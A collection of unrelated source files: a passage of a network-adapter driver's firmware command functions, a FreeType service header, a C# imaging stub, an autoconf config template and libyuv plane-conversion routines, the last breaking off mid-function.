dma_alloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, GFP_KERNEL); if (!cmd.va) { dev_err(&adapter->pdev->dev, "Memory alloc failure\n"); return -ENOMEM; } spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = cmd.va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_SET_MAC_LIST, sizeof(*req), wrb, &cmd); req->hdr.domain = domain; req->mac_count = mac_count; if (mac_count) memcpy(req->mac, mac_array, ETH_ALEN*mac_count); status = be_mcc_notify_wait(adapter); err: dma_free_coherent(&adapter->pdev->dev, cmd.size, cmd.va, cmd.dma); spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_set_hsw_config(struct be_adapter *adapter, u16 pvid, u32 domain, u16 intf_id) { struct be_mcc_wrb *wrb; struct be_cmd_req_set_hsw_config *req; void *ctxt; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); ctxt = &req->context; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_SET_HSW_CONFIG, sizeof(*req), wrb, NULL); req->hdr.domain = domain; AMAP_SET_BITS(struct amap_set_hsw_context, interface_id, ctxt, intf_id); if (pvid) { AMAP_SET_BITS(struct amap_set_hsw_context, pvid_valid, ctxt, 1); AMAP_SET_BITS(struct amap_set_hsw_context, pvid, ctxt, pvid); } be_dws_cpu_to_le(req->context, sizeof(req->context)); status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Get Hyper switch config */ int be_cmd_get_hsw_config(struct be_adapter *adapter, u16 *pvid, u32 domain, u16 intf_id) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_hsw_config *req; void *ctxt; int status; u16 vid; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); ctxt = &req->context; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_HSW_CONFIG, sizeof(*req), wrb, NULL); req->hdr.domain = domain; AMAP_SET_BITS(struct amap_get_hsw_req_context, interface_id, ctxt, intf_id); AMAP_SET_BITS(struct amap_get_hsw_req_context, pvid_valid, ctxt, 1); be_dws_cpu_to_le(req->context, sizeof(req->context)); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_get_hsw_config *resp = embedded_payload(wrb); be_dws_le_to_cpu(&resp->context, sizeof(resp->context)); vid = AMAP_GET_BITS(struct amap_get_hsw_resp_context, pvid, &resp->context); *pvid = le16_to_cpu(vid); } err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_get_acpi_wol_cap(struct be_adapter *adapter) { struct be_mcc_wrb *wrb; struct be_cmd_req_acpi_wol_magic_config_v1 *req; int status; int payload_len = sizeof(*req); struct be_dma_mem cmd; memset(&cmd, 0, sizeof(struct be_dma_mem)); cmd.size = sizeof(struct be_cmd_resp_acpi_wol_magic_config_v1); cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); if (!cmd.va) { dev_err(&adapter->pdev->dev, "Memory allocation failure\n"); return -ENOMEM; } if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); if (!wrb) { status = -EBUSY; goto err; } req = cmd.va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_ACPI_WOL_MAGIC_CONFIG, payload_len, wrb, &cmd); req->hdr.version = 1; req->query_options = BE_GET_WOL_CAP; status = be_mbox_notify_wait(adapter); if (!status) { struct be_cmd_resp_acpi_wol_magic_config_v1 *resp; resp = (struct be_cmd_resp_acpi_wol_magic_config_v1 *) cmd.va; /* the command could succeed misleadingly on old f/w * which is not aware of the V1 version. fake an error. */ if (resp->hdr.response_length < payload_len) { status = -1; goto err; } adapter->wol_cap = resp->wol_settings; } err: mutex_unlock(&adapter->mbox_lock); pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); return status; }
{ "language": "C" }
/***************************************************************************/ /* */ /* svxf86nm.h */ /* */ /* The FreeType XFree86 services (specification only). */ /* */ /* Copyright 2003 by */ /* David Turner, Robert Wilhelm, and Werner Lemberg. */ /* */ /* This file is part of the FreeType project, and may only be used, */ /* modified, and distributed under the terms of the FreeType project */ /* license, LICENSE.TXT. By continuing to use, modify, or distribute */ /* this file you indicate that you have read the license and */ /* understand and accept it fully. */ /* */ /***************************************************************************/ #ifndef __SVXF86NM_H__ #define __SVXF86NM_H__ #include FT_INTERNAL_SERVICE_H FT_BEGIN_HEADER /* * A trivial service used to return the name of a face's font driver, * according to the XFree86 nomenclature. Note that the service data * is a simple constant string pointer. */ #define FT_SERVICE_ID_XF86_NAME "xf86-driver-name" #define FT_XF86_FORMAT_TRUETYPE "TrueType" #define FT_XF86_FORMAT_TYPE_1 "Type 1" #define FT_XF86_FORMAT_BDF "BDF" #define FT_XF86_FORMAT_PCF "PCF" #define FT_XF86_FORMAT_TYPE_42 "Type 42" #define FT_XF86_FORMAT_CID "CID Type 1" #define FT_XF86_FORMAT_CFF "CFF" #define FT_XF86_FORMAT_PFR "PFR" #define FT_XF86_FORMAT_WINFNT "Windows FNT" /* */ FT_END_HEADER #endif /* __SVXF86NM_H__ */ /* END */
{ "language": "C" }
#pragma warning disable 108 // new keyword hiding #pragma warning disable 114 // new keyword hiding namespace Windows.Graphics.Imaging { #if __ANDROID__ || __IOS__ || NET461 || __WASM__ || __SKIA__ || __NETSTD_REFERENCE__ || __MACOS__ [global::Uno.NotImplemented] #endif public partial struct BitmapBounds { // Forced skipping of method Windows.Graphics.Imaging.BitmapBounds.BitmapBounds() #if __ANDROID__ || __IOS__ || NET461 || __WASM__ || __SKIA__ || __NETSTD_REFERENCE__ || __MACOS__ public uint X; #endif #if __ANDROID__ || __IOS__ || NET461 || __WASM__ || __SKIA__ || __NETSTD_REFERENCE__ || __MACOS__ public uint Y; #endif #if __ANDROID__ || __IOS__ || NET461 || __WASM__ || __SKIA__ || __NETSTD_REFERENCE__ || __MACOS__ public uint Width; #endif #if __ANDROID__ || __IOS__ || NET461 || __WASM__ || __SKIA__ || __NETSTD_REFERENCE__ || __MACOS__ public uint Height; #endif } }
{ "language": "C" }
/* config.h.in. Generated from configure.ac by autoheader. */ /* Define to 1 if you have the <dlfcn.h> header file. */ #undef HAVE_DLFCN_H /* Define to 1 if you have the `fork' function. */ #undef HAVE_FORK /* Define to 1 if you have the `gettimeofday' function. */ #undef HAVE_GETTIMEOFDAY /* no HEP support */ #undef HAVE_HEP /* Define to 1 if you have the <inttypes.h> header file. */ #undef HAVE_INTTYPES_H /* Define to 1 if you have the `dl' library (-ldl). */ #undef HAVE_LIBDL /* Define to 1 if you have the `nsl' library (-lnsl). */ #undef HAVE_LIBNSL /* Define to 1 if you have the `pcap' library (-lpcap). */ #undef HAVE_LIBPCAP /* Define to 1 if you have the `pthread' library (-lpthread). */ #undef HAVE_LIBPTHREAD /* Define to 1 if you have the `socket' library (-lsocket). */ #undef HAVE_LIBSOCKET /* Define to 1 if you have the `wpcap' library (-lwpcap). */ #undef HAVE_LIBWPCAP /* Define to 1 if your system has a GNU libc compatible `malloc' function, and to 0 otherwise. */ #undef HAVE_MALLOC /* Define to 1 if you have the <memory.h> header file. */ #undef HAVE_MEMORY_H /* Define to 1 if you have the `memset' function. */ #undef HAVE_MEMSET /* Define to 1 if you have the `select' function. */ #undef HAVE_SELECT /* Define to 1 if you have the `socket' function. */ #undef HAVE_SOCKET /* Define to 1 if you have the <stdint.h> header file. */ #undef HAVE_STDINT_H /* Define to 1 if you have the <stdlib.h> header file. */ #undef HAVE_STDLIB_H /* Define to 1 if you have the `strdup' function. */ #undef HAVE_STRDUP /* Define to 1 if you have the `strerror' function. */ #undef HAVE_STRERROR /* Define to 1 if you have the <strings.h> header file. */ #undef HAVE_STRINGS_H /* Define to 1 if you have the <string.h> header file. */ #undef HAVE_STRING_H /* Define to 1 if you have the `strndup' function. */ #undef HAVE_STRNDUP /* Define to 1 if you have the <sys/stat.h> header file. */ #undef HAVE_SYS_STAT_H /* Define to 1 if you have the <sys/types.h> header file. */ #undef HAVE_SYS_TYPES_H /* Define to 1 if you have the <unistd.h> header file. */ #undef HAVE_UNISTD_H /* Define to 1 if you have the `vfork' function. */ #undef HAVE_VFORK /* Define to 1 if you have the <vfork.h> header file. */ #undef HAVE_VFORK_H /* Define to 1 if `fork' works. */ #undef HAVE_WORKING_FORK /* Define to 1 if `vfork' works. */ #undef HAVE_WORKING_VFORK /* Define to the sub-directory in which libtool stores uninstalled libraries. */ #undef LT_OBJDIR /* Define to 1 if Operating System is Darwin */ #undef OS_DARWIN /* Define to 1 if Operating System is FreeBSD */ #undef OS_FREEBSD /* Define to 1 if Operating System is Linux */ #undef OS_LINUX /* Define to 1 if Operating System is NETBSD */ #undef OS_NETBSD /* Define to 1 if Operating System is SOLARIS */ #undef OS_SOLARIS /* Name of package */ #undef PACKAGE /* Define to the address where bug reports for this package should be sent. */ #undef PACKAGE_BUGREPORT /* Define to the full name of this package. */ #undef PACKAGE_NAME /* Define to the full name and version of this package. */ #undef PACKAGE_STRING /* Define to the one symbol short name of this package. */ #undef PACKAGE_TARNAME /* Define to the home page for this package. */ #undef PACKAGE_URL /* Define to the version of this package. */ #undef PACKAGE_VERSION /* Define to 1 if you have the ANSI C header files. */ #undef STDC_HEADERS /* Use NCURSES library */ #undef USE_NCURSES /* Use PCRE library */ #undef USE_PCRE /* Use REDIS library */ #undef USE_REDIS /* Use OpenSSL SSL library */ #undef USE_SSL /* Use ZIP library */ #undef USE_ZLIB /* Version number of package */ #undef VERSION /* Define for Solaris 2.5.1 so the uint32_t typedef from <sys/synch.h>, <pthread.h>, or <semaphore.h> is not used. If the typedef were allowed, the #define below would cause a syntax error. */ #undef _UINT32_T /* Define for Solaris 2.5.1 so the uint8_t typedef from <sys/synch.h>, <pthread.h>, or <semaphore.h> is not used. If the typedef were allowed, the #define below would cause a syntax error. */ #undef _UINT8_T /* Define to the type of a signed integer type of width exactly 32 bits if such a type exists and the standard includes do not define it. */ #undef int32_t /* Define to the type of a signed integer type of width exactly 8 bits if such a type exists and the standard includes do not define it. */ #undef int8_t /* Define to rpl_malloc if the replacement function should be used. */ #undef malloc /* Define to `int' if <sys/types.h> does not define. */ #undef pid_t /* Define to the type of an unsigned integer type of width exactly 16 bits if such a type exists and the standard includes do not define it. */ #undef uint16_t /* Define to the type of an unsigned integer type of width exactly 32 bits if such a type exists and the standard includes do not define it. */ #undef uint32_t /* Define to the type of an unsigned integer type of width exactly 8 bits if such a type exists and the standard includes do not define it. */ #undef uint8_t /* Define as `fork' if `vfork' does not work. */ #undef vfork
{ "language": "C" }
/* * Copyright (c) 2011 The LibYuv project authors. All Rights Reserved. * * Use of this source code is governed by a BSD-style license * that can be found in the LICENSE file in the root of the source * tree. An additional intellectual property rights grant can be found * in the file PATENTS. All contributing project authors may * be found in the AUTHORS file in the root of the source tree. */ #include "libyuv/planar_functions.h" #include <stdio.h> // printf() #include <string.h> // for memset() #include "libyuv/cpu_id.h" #include "source/row.h" #ifdef __cplusplus namespace libyuv { extern "C" { #endif // Copy a plane of data void CopyPlane(const uint8* src_y, int src_stride_y, uint8* dst_y, int dst_stride_y, int width, int height) { void (*CopyRow)(const uint8* src, uint8* dst, int width) = CopyRow_C; #if defined(HAS_COPYROW_NEON) if (TestCpuFlag(kCpuHasNEON) && IS_ALIGNED(width, 64)) { CopyRow = CopyRow_NEON; } #endif #if defined(HAS_COPYROW_X86) if (TestCpuFlag(kCpuHasX86) && IS_ALIGNED(width, 4)) { CopyRow = CopyRow_X86; } #endif #if defined(HAS_COPYROW_SSE2) if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(width, 32) && IS_ALIGNED(src_y, 16) && IS_ALIGNED(src_stride_y, 16) && IS_ALIGNED(dst_y, 16) && IS_ALIGNED(dst_stride_y, 16)) { CopyRow = CopyRow_SSE2; } #endif // Copy plane for (int y = 0; y < height; ++y) { CopyRow(src_y, dst_y, width); src_y += src_stride_y; dst_y += dst_stride_y; } } // Mirror a plane of data void MirrorPlane(const uint8* src_y, int src_stride_y, uint8* dst_y, int dst_stride_y, int width, int height) { void (*MirrorRow)(const uint8* src, uint8* dst, int width) = MirrorRow_C; #if defined(HAS_MIRRORROW_NEON) if (TestCpuFlag(kCpuHasNEON) && IS_ALIGNED(width, 16)) { MirrorRow = MirrorRow_NEON; } #endif #if defined(HAS_MIRRORROW_SSE2) if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(width, 16)) { MirrorRow = MirrorRow_SSE2; #if defined(HAS_MIRRORROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && IS_ALIGNED(src_y, 16) && IS_ALIGNED(src_stride_y, 16)) { MirrorRow = MirrorRow_SSSE3; } #endif } #endif // Mirror plane for (int y = 0; y < height; ++y) { MirrorRow(src_y, dst_y, width); src_y += src_stride_y; dst_y += dst_stride_y; } } // Mirror I420 with optional flipping int I420Mirror(const uint8* src_y, int src_stride_y, const uint8* src_u, int src_stride_u, const uint8* src_v, int src_stride_v, uint8* dst_y, int dst_stride_y, uint8* dst_u, int dst_stride_u, uint8* dst_v, int dst_stride_v, int width, int height) { if (!src_y || !src_u || !src_v || !dst_y || !dst_u || !dst_v || width <= 0 || height == 0) { return -1; } // Negative height means invert the image. if (height < 0) { height = -height; int halfheight = (height + 1) >> 1; src_y = src_y + (height - 1) * src_stride_y; src_u = src_u + (halfheight - 1) * src_stride_u; src_v = src_v + (halfheight - 1) * src_stride_v; src_stride_y = -src_stride_y; src_stride_u = -src_stride_u; src_stride_v = -src_stride_v; } int halfwidth = (width + 1) >> 1; int halfheight = (height + 1) >> 1; if (dst_y) { MirrorPlane(src_y, src_stride_y, dst_y, dst_stride_y, width, height); } MirrorPlane(src_u, src_stride_u, dst_u, dst_stride_u, halfwidth, halfheight); MirrorPlane(src_v, src_stride_v, dst_v, dst_stride_v, halfwidth, halfheight); return 0; } // Copy ARGB with optional flipping int ARGBCopy(const uint8* src_argb, int src_stride_argb, uint8* dst_argb, int dst_stride_argb, int width, int height) { if (!src_argb || !dst_argb || width <= 0 || height == 0) { return -1; } // Negative height means invert the image. if (height < 0) { height = -height; src_argb = src_argb + (height - 1) * src_stride_argb; src_stride_argb = -src_stride_argb; } CopyPlane(src_argb, src_stride_argb, dst_argb, dst_stride_argb, width * 4, height); return 0; } // Get a blender that optimized for the CPU, alignment and pixel count. // As there are 6 blenders to choose from, the caller should try to use // the same blend function for all pixels if possible. ARGBBlendRow GetARGBBlend(uint8* dst_argb, int dst_stride_argb, int width) { void (*ARGBBlendRow)(const uint8* src_argb, const uint8* src_argb1, uint8* dst_argb, int width) = ARGBBlendRow_C; #if defined(HAS_ARGBBLENDROW_SSE2) if (TestCpuFlag(kCpuHasSSE2)) { ARGBBlendRow = ARGBBlendRow1_SSE2; if (width >= 4) { ARGBBlendRow = ARGBBlendRow_Any_SSE2; if (IS_ALIGNED(width, 4) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { ARGBBlendRow = ARGBBlendRow_Aligned_SSE2; } } } #endif #if defined(HAS_ARGBBLENDROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && width >= 4) { ARGBBlendRow = ARGBBlendRow_Any_SSSE3; if (IS_ALIGNED(width, 4) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { ARGBBlendRow = ARGBBlendRow_Aligned_SSSE3; } } #endif return ARGBBlendRow; } // Alpha Blend 2 ARGB images and store to destination. int ARGBBlend(const uint8* src_argb0, int src_stride_argb0, const uint8* src_argb1, int src_stride_argb1, uint8* dst_argb, int dst_stride_argb, int width, int height) { if (!src_argb0 || !src_argb1 || !dst_argb || width <= 0 || height == 0) { return -1; } // Negative height means invert the image. if (height < 0) { height = -height; dst_argb = dst_argb + (height - 1) * dst_stride_argb; dst_stride_argb = -dst_stride_argb; } void (*ARGBBlendRow)(const uint8* src_argb, const uint8* src_argb1, uint8* dst_argb, int width) = GetARGBBlend(dst_argb, dst_stride_argb, width); for (int y = 0; y < height; ++y) { ARGBBlendRow(src_argb0, src_argb1, dst_argb, width); src_argb0 += src_stride_argb0; src_argb1 += src_stride_argb1; dst_argb += dst_stride_argb; } return 0; } // Convert I422 to ARGB. int I422ToARGB(const uint8* src_y, int src_stride_y, const uint8* src_u, int src_stride_u, const uint8* src_v, int src_stride_v, uint8* dst_argb, int dst_stride_argb, int width, int height) { // Negative height means invert the image. if (height < 0) { height = -height; dst_argb = dst_argb + (height - 1) * dst_stride_argb; dst_stride_argb = -dst_stride_argb; } void (*I420ToARGBRow)(const uint8* y_buf, const uint8* u_buf, const uint8* v_buf, uint8* rgb_buf, int width) = I420ToARGBRow_C; #if defined(HAS_I420TOARGBROW_NEON) if (TestCpuFlag(kCpuHasNEON)) { I420ToARGBRow = I420ToARGBRow_Any_NEON; if (IS_ALIGNED(width, 16)) { I420ToARGBRow = I420ToARGBRow_NEON; } } #elif defined(HAS_I420TOARGBROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && width >= 8) { I420ToARGBRow = I420ToARGBRow_Any_SSSE3; if (IS_ALIGNED(width, 8) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { I420ToARGBRow = I420ToARGBRow_SSSE3; } } #endif for (int y = 0; y < height; ++y) { I420ToARGBRow(src_y, src_u, src_v, dst_argb, width); dst_argb += dst_stride_argb; src_y += src_stride_y; src_u += src_stride_u; src_v += src_stride_v; } return 0; } // Convert I444 to ARGB. int I444ToARGB(const uint8* src_y, int src_stride_y, const uint8* src_u, int src_stride_u, const uint8* src_v, int src_stride_v, uint8* dst_argb, int dst_stride_argb, int width, int height) { // Negative height means invert the image. if (height < 0) { height = -height; dst_argb = dst_argb + (height - 1) * dst_stride_argb; dst_stride_argb = -dst_stride_argb; } void (*I444ToARGBRow)(const uint8* y_buf, const uint8* u_buf, const uint8* v_buf, uint8* rgb_buf, int width) = I444ToARGBRow_C; #if defined(HAS_I444TOARGBROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && IS_ALIGNED(width, 8) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { I444ToARGBRow = I444ToARGBRow_SSSE3; } #endif for (int y = 0; y < height; ++y) { I444ToARGBRow(src_y, src_u, src_v, dst_argb, width); dst_argb += dst_stride_argb; src_y += src_stride_y; src_u += src_stride_u; src_v += src_stride_v; } return 0; } // Convert I400 to ARGB. int I400ToARGB_Reference(const uint8* src_y, int src_stride_y, uint8* dst_argb, int dst_stride_argb, int width, int height) { // Negative height means invert the image. if (height < 0) { height = -height; dst_argb = dst_argb + (height - 1) * dst_stride_argb; dst_stride_argb = -dst_stride_argb; } void (*YToARGBRow)(const uint8* y_buf, uint8* rgb_buf, int width) = YToARGBRow_C; #if defined(HAS_YTOARGBROW_SSE2) if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(width, 8) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { YToARGBRow = YToARGBRow_SSE2; } #endif for (int y = 0; y < height; ++y) { YToARGBRow(src_y, dst_argb, width); dst_argb += dst_stride_argb; src_y += src_stride_y; } return 0; } // Convert I400 to ARGB. int I400ToARGB(const uint8* src_y, int src_stride_y, uint8* dst_argb, int dst_stride_argb, int width, int height) { if (height < 0) { height = -height; src_y = src_y + (height - 1) * src_stride_y; src_stride_y = -src_stride_y; } void (*I400ToARGBRow)(const uint8* src_y, uint8* dst_argb, int pix) = I400ToARGBRow_C; #if defined(HAS_I400TOARGBROW_SSE2) if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(width, 8) && IS_ALIGNED(src_y, 8) && IS_ALIGNED(src_stride_y, 8) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { I400ToARGBRow = I400ToARGBRow_SSE2; } #endif for (int y = 0; y < height; ++y) { I400ToARGBRow(src_y, dst_argb, width); src_y += src_stride_y; dst_argb += dst_stride_argb; } return 0; } int ABGRToARGB(const uint8* src_abgr, int src_stride_abgr, uint8* dst_argb, int dst_stride_argb, int width, int height) { if (height < 0) { height = -height; src_abgr = src_abgr + (height - 1) * src_stride_abgr; src_stride_abgr = -src_stride_abgr; } void (*ABGRToARGBRow)(const uint8* src_abgr, uint8* dst_argb, int pix) = ABGRToARGBRow_C; #if defined(HAS_ABGRTOARGBROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && IS_ALIGNED(width, 4) && IS_ALIGNED(src_abgr, 16) && IS_ALIGNED(src_stride_abgr, 16) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { ABGRToARGBRow = ABGRToARGBRow_SSSE3; } #endif for (int y = 0; y < height; ++y) { ABGRToARGBRow(src_abgr, dst_argb, width); src_abgr += src_stride_abgr; dst_argb += dst_stride_argb; } return 0; } // Convert BGRA to ARGB. int BGRAToARGB(const uint8* src_bgra, int src_stride_bgra, uint8* dst_argb, int dst_stride_argb, int width, int height) { if (height < 0) { height = -height; src_bgra = src_bgra + (height - 1) * src_stride_bgra; src_stride_bgra = -src_stride_bgra; } void (*BGRAToARGBRow)(const uint8* src_bgra, uint8* dst_argb, int pix) = BGRAToARGBRow_C; #if defined(HAS_BGRATOARGBROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && IS_ALIGNED(width, 4) && IS_ALIGNED(src_bgra, 16) && IS_ALIGNED(src_stride_bgra, 16) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { BGRAToARGBRow = BGRAToARGBRow_SSSE3; } #endif for (int y = 0; y < height; ++y) { BGRAToARGBRow(src_bgra, dst_argb, width); src_bgra += src_stride_bgra; dst_argb += dst_stride_argb; } return 0; } // Convert ARGB to I400. int ARGBToI400(const uint8* src_argb, int src_stride_argb, uint8* dst_y, int dst_stride_y, int width, int height) { if (height < 0) { height = -height; src_argb = src_argb + (height - 1) * src_stride_argb; src_stride_argb = -src_stride_argb; } void (*ARGBToYRow)(const uint8* src_argb, uint8* dst_y, int pix) = ARGBToYRow_C; #if defined(HAS_ARGBTOYROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && IS_ALIGNED(width, 4) && IS_ALIGNED(src_argb, 16) && IS_ALIGNED(src_stride_argb, 16) && IS_ALIGNED(dst_y, 16) && IS_ALIGNED(dst_stride_y, 16)) { ARGBToYRow = ARGBToYRow_SSSE3; } #endif for (int y = 0; y < height; ++y) { ARGBToYRow(src_argb, dst_y, width); src_argb += src_stride_argb; dst_y += dst_stride_y; } return 0; } // Convert RAW to ARGB. int RAWToARGB(const uint8* src_raw, int src_stride_raw, uint8* dst_argb, int dst_stride_argb, int width, int height) { if (height < 0) { height = -height; src_raw = src_raw + (height - 1) * src_stride_raw; src_stride_raw = -src_stride_raw; } void (*RAWToARGBRow)(const uint8* src_raw, uint8* dst_argb, int pix) = RAWToARGBRow_C; #if defined(HAS_RAWTOARGBROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && IS_ALIGNED(width, 16) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { RAWToARGBRow = RAWToARGBRow_SSSE3; } #endif for (int y = 0; y < height; ++y) { RAWToARGBRow(src_raw, dst_argb, width); src_raw += src_stride_raw; dst_argb += dst_stride_argb; } return 0; } // Convert RGB24 to ARGB. int RGB24ToARGB(const uint8* src_rgb24, int src_stride_rgb24, uint8* dst_argb, int dst_stride_argb, int width, int height) { if (height < 0) { height = -height; src_rgb24 = src_rgb24 + (height - 1) * src_stride_rgb24; src_stride_rgb24 = -src_stride_rgb24; } void (*RGB24ToARGBRow)(const uint8* src_rgb24, uint8* dst_argb, int pix) = RGB24ToARGBRow_C; #if defined(HAS_RGB24TOARGBROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && IS_ALIGNED(width, 16) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { RGB24ToARGBRow = RGB24ToARGBRow_SSSE3; } #endif for (int y = 0; y < height; ++y) { RGB24ToARGBRow(src_rgb24, dst_argb, width); src_rgb24 += src_stride_rgb24; dst_argb += dst_stride_argb; } return 0; } // Convert ARGB To RGB24. int ARGBToRGB24(const uint8* src_argb, int src_stride_argb, uint8* dst_rgb24, int dst_stride_rgb24, int width, int height) { if (height < 0) { height = -height; src_argb = src_argb + (height - 1) * src_stride_argb; src_stride_argb = -src_stride_argb; } void (*ARGBToRGB24Row)(const uint8* src_argb, uint8* dst_rgb, int pix) = ARGBToRGB24Row_C; #if defined(HAS_ARGBTORGB24ROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && IS_ALIGNED(src_argb, 16) && IS_ALIGNED(src_stride_argb, 16)) { if (width * 3 <= kMaxStride) { ARGBToRGB24Row = ARGBToRGB24Row_Any_SSSE3; } if (IS_ALIGNED(width, 16) && IS_ALIGNED(dst_rgb24, 16) && IS_ALIGNED(dst_stride_rgb24, 16)) { ARGBToRGB24Row = ARGBToRGB24Row_SSSE3; } } #endif for (int y = 0; y < height; ++y) { ARGBToRGB24Row(src_argb, dst_rgb24, width); src_argb += src_stride_argb; dst_rgb24 += dst_stride_rgb24; } return 0; } // Convert ARGB To RAW. int ARGBToRAW(const uint8* src_argb, int src_stride_argb, uint8* dst_raw, int dst_stride_raw, int width, int height) { if (height < 0) { height = -height; src_argb = src_argb + (height - 1) * src_stride_argb; src_stride_argb = -src_stride_argb; } void (*ARGBToRAWRow)(const uint8* src_argb, uint8* dst_rgb, int pix) = ARGBToRAWRow_C; #if defined(HAS_ARGBTORAWROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && IS_ALIGNED(src_argb, 16) && IS_ALIGNED(src_stride_argb, 16)) { if (width * 3 <= kMaxStride) { ARGBToRAWRow = ARGBToRAWRow_Any_SSSE3; } if (IS_ALIGNED(width, 16) && IS_ALIGNED(dst_raw, 16) && IS_ALIGNED(dst_stride_raw, 16)) { ARGBToRAWRow = ARGBToRAWRow_SSSE3; } } #endif for (int y = 0; y < height; ++y) { ARGBToRAWRow(src_argb, dst_raw, width); src_argb += src_stride_argb; dst_raw += dst_stride_raw; } return 0; } // Convert NV12 to ARGB. int NV12ToARGB(const uint8* src_y, int src_stride_y, const uint8* src_uv, int src_stride_uv, uint8* dst_argb, int dst_stride_argb, int width, int height) { // Negative height means invert the image. if (height < 0) { height = -height; dst_argb = dst_argb + (height - 1) * dst_stride_argb; dst_stride_argb = -dst_stride_argb; } void (*I420ToARGBRow)(const uint8* y_buf, const uint8* u_buf, const uint8* v_buf, uint8* argb_buf, int width) = I420ToARGBRow_C; #if defined(HAS_I420TOARGBROW_NEON) if (TestCpuFlag(kCpuHasNEON)) { I420ToARGBRow = I420ToARGBRow_Any_NEON; if (IS_ALIGNED(width, 16)) { I420ToARGBRow = I420ToARGBRow_NEON; } } #elif defined(HAS_I420TOARGBROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && width >= 8) { I420ToARGBRow = I420ToARGBRow_Any_SSSE3; if (IS_ALIGNED(width, 8) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { I420ToARGBRow = I420ToARGBRow_SSSE3; } } #endif int halfwidth = (width + 1) >> 1; void (*SplitUV)(const uint8* src_uv, uint8* dst_u, uint8* dst_v, int pix) = SplitUV_C; #if defined(HAS_SPLITUV_NEON) if (TestCpuFlag(kCpuHasNEON)) { SplitUV = SplitUV_NEON; } #elif defined(HAS_SPLITUV_SSE2) if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(src_uv, 16) && IS_ALIGNED(src_stride_uv, 16)) { SplitUV = SplitUV_SSE2; } #endif SIMD_ALIGNED(uint8 rowuv[kMaxStride * 2]); for (int y = 0; y < height; ++y) { if ((y & 1) == 0) { // Copy a row of UV. SplitUV(src_uv, rowuv, rowuv + kMaxStride, halfwidth); src_uv += src_stride_uv; } I420ToARGBRow(src_y, rowuv, rowuv + kMaxStride, dst_argb, width); dst_argb += dst_stride_argb; src_y += src_stride_y; } return 0; } // Convert NV12 to RGB565. int NV12ToRGB565(const uint8* src_y, int src_stride_y, const uint8* src_uv, int src_stride_uv, uint8* dst_rgb, int dst_stride_rgb, int width, int height) { // Negative height means invert the image. if (height < 0) { height = -height; dst_rgb = dst_rgb + (height - 1) * dst_stride_rgb; dst_stride_rgb = -dst_stride_rgb; } void (*I420ToARGBRow)(const uint8* y_buf, const uint8* u_buf, const uint8* v_buf, uint8* rgb_buf, int width) = I420ToARGBRow_C; #if defined(HAS_I420TOARGBROW_NEON) if (TestCpuFlag(kCpuHasNEON)) { I420ToARGBRow = I420ToARGBRow_NEON; } #elif defined(HAS_I420TOARGBROW_SSSE3) if (TestCpuFlag(kCpuHasSSSE3)) { I420ToARGBRow = I420ToARGBRow_SSSE3; } #endif SIMD_ALIGNED(uint8 row[kMaxStride]); void (*ARGBToRGB565Row)(const uint8* src_argb, uint8* dst_rgb, int pix) = ARGBToRGB565Row_C; #if defined(HAS_ARGBTORGB565ROW_SSE2) if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(width, 4)) { ARGBToRGB565Row = ARGBToRGB565Row_SSE2; } #endif int halfwidth = (width + 1) >> 1; void (*SplitUV)(const uint8* src_uv, 